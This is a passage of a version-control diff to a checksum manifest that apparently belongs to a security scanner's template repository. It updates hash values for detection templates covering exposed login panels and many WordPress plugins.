http/exposed-panels/daybyday-panel.yaml:ed65d347e09146954a5b1cca407532d78a58c05e http/exposed-panels/defectdojo-panel.yaml:001b3b8655d778e45da88fdfd212b9f1195f0df7 -http/exposed-panels/dell-idrac.yaml:c7a924d17381876bc86adc6dbdc6ff3ff7780ac1 +http/exposed-panels/dell-idrac.yaml:5c2bf1e55a058ebc72c278b745dec7f32a2e1c52 http/exposed-panels/dell-openmanager-login.yaml:c5e109cb5ad04b406e27788f57dd43b0928ec207 http/exposed-panels/dell-wyse-login.yaml:6b91c4824dda8ac6ce13fb2a958d78e02e43b54b http/exposed-panels/delta-login-panel.yaml:21413b42b25c6a8452c03d484840a0bd28137c1e @@ -5332,214 +5335,214 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114 -http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd -http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51 +http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed +http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724 -http/technologies/wordpress/plugins/akismet.yaml:b007755cc48a7a531a0e8fa3c452f9f74b483a5c -http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e -http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4 -http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f -http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07 -http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1 -http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c -http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff -http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a -http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c -http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d -http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a -http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae -http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299 -http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9 -http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369 -http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844 -http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c -http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636 -http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e -http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a -http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f -http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7 -http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057 -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459 -http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad -http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f -http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0 -http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af -http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a -http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121 -http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 +http/technologies/wordpress/plugins/akismet.yaml:c2fc28f9352683a8951ff433fcd774b49feaf0eb +http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc +http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 +http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 +http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b +http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226 +http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 +http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46 +http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 +http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f +http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b +http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365 +http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f +http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 +http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 +http/technologies/wordpress/plugins/cloudflare.yaml:431bca4737941e71c01f7ab9ce8f7fc45c7670a2 +http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff +http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a +http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e +http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f +http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af +http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb +http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e +http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7 +http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0 +http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9 +http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157 +http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a +http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5 +http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2 +http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45 -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab -http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8 -http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77 -http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e -http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1 -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba -http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d -http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823 -http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24 -http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca -http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:8f722e7fd4d82c5a072583269575be55ab6d3124 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:d43e8f2af19c16d5e9d768be20676774bb14653f -http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214 -http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc -http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9 -http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765 -http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2 -http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23 -http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317 -http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461 -http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30 -http/technologies/wordpress/plugins/instagram-feed.yaml:bdd26849be9346090645fcedf5e7c21f9634433e -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b -http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f -http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde -http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a -http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac -http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046 -http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8 -http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b -http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0 -http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519 -http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4 -http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb -http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4 -http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623 -http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd -http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb -http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510 -http/technologies/wordpress/plugins/ml-slider.yaml:3a91387c9a73aa27dcfe61ae0f6c73803d90410a -http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29 -http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf -http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8 -http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159 -http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af -http/technologies/wordpress/plugins/otter-blocks.yaml:dd77f96680874688c4f833694d8282493a4b3ba8 -http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68 -http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18 -http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72 +http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77 +http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb +http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8 +http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1 +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f +http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2 +http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5 +http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9 +http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33 +http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:6b829502bedd78aae545f30777fe1f110f16a7ad +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:4ea09b17d82c48189149274385a07113cf6c77f6 +http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b +http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b +http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630 +http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:2c6eb5a2958fa71c5f9b9f3c9cc3f923957ae653 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90 +http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078 +http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb +http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c +http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47 +http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5 +http/technologies/wordpress/plugins/instagram-feed.yaml:1bb251cec19a4850bae825a0ab57a25391c0d4bf +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b +http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952 +http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e +http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c +http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9 +http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9 +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787 +http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764 +http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93 +http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b +http/technologies/wordpress/plugins/loginpress.yaml:9a0ec851b287c8d93465394a34c0e06dcdf58dcc +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea +http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d +http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd +http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f +http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919 +http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251 +http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e +http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6 +http/technologies/wordpress/plugins/ml-slider.yaml:02dff647f100193d671151fb1e67b2f5ddcc8a53 +http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c +http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f +http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6 +http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8 +http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70 +http/technologies/wordpress/plugins/otter-blocks.yaml:323522fa2b0c8af98838b2347a51f91ceefc2067 +http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1 +http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12 +http/technologies/wordpress/plugins/photo-gallery.yaml:382590e69485fae675191962251cb3c5bd385aba http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553 -http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c -http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d -http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988 -http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e -http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2 -http/technologies/wordpress/plugins/post-types-order.yaml:ac4e48bb51998b2fb77e25135e3a34ccd1ff5bb3 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4 -http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147 -http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19 -http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8 -http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd -http/technologies/wordpress/plugins/sg-cachepress.yaml:130f5809e4cf765690b79bcfda7bd132336e4b08 -http/technologies/wordpress/plugins/sg-security.yaml:6bbec86489b5c2eaf257315880bfc0c4fd4d464f -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:0869b92e5fc5980a1d9af28e866cba52048985d7 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6 